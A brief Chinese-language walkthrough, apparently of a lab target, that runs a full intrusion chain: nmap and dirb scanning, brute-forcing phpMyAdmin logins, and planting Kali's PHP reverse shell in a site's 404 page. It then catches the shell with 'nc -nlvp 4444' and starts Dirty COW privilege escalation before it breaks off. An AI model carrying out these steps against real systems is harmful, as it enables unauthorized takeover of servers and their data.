第一步:確定目標網站的ip
1、通過域名解析的方式得到IP(以下操作均在kali)
第二步:對目標網站進行掃描
nmap -sS -sV -p- -T4 192.168.1.138
可以看到開放端口80 3306 21等確認開放了80端口,那麼我們掃他的頁面,看有沒有登錄入口什麼的
第三步:掃描頁面
dirb http://192.168.1.138
對網頁中含有admin這類等敏感頁面進行踩點。
第四步:爆破登錄頁面
1、手動爆破:手動猜賬號和密碼。
2、使用爆破工具:爆破phpmyadmin數據庫登錄頁面使用phpMyAdmin多線程批量破解工具,其他網站可以使用Burpsuite進行爆破
爆破後可以拿到賬號和密碼登錄數據庫後臺管理創建登錄系統的賬號和密碼。(或者刪庫跑路哈哈哈)
第五步:打開kali自帶的shell文件
cat /usr/share/webshells/php/php-reverse-shell.php
第六步:使用前面設置的網站管理賬號和密碼登錄系統,找到404PHP頁面,把剛纔的shell文件複製進去,修改IP和端口號(只要運行了404頁面,整個操作系統都會被kali控制)
第七步:運行 nc -nlvp 4444同時在系統端訪問不存在的頁面(也就是激活404頁面的shell)
此時已經控制了操作系統,但是權限爲apache的權限,接下來需要提權到root權限
第八步:提權
1、查看操作系統的版本,判斷是否有漏洞
利用贓牛漏洞進行提權。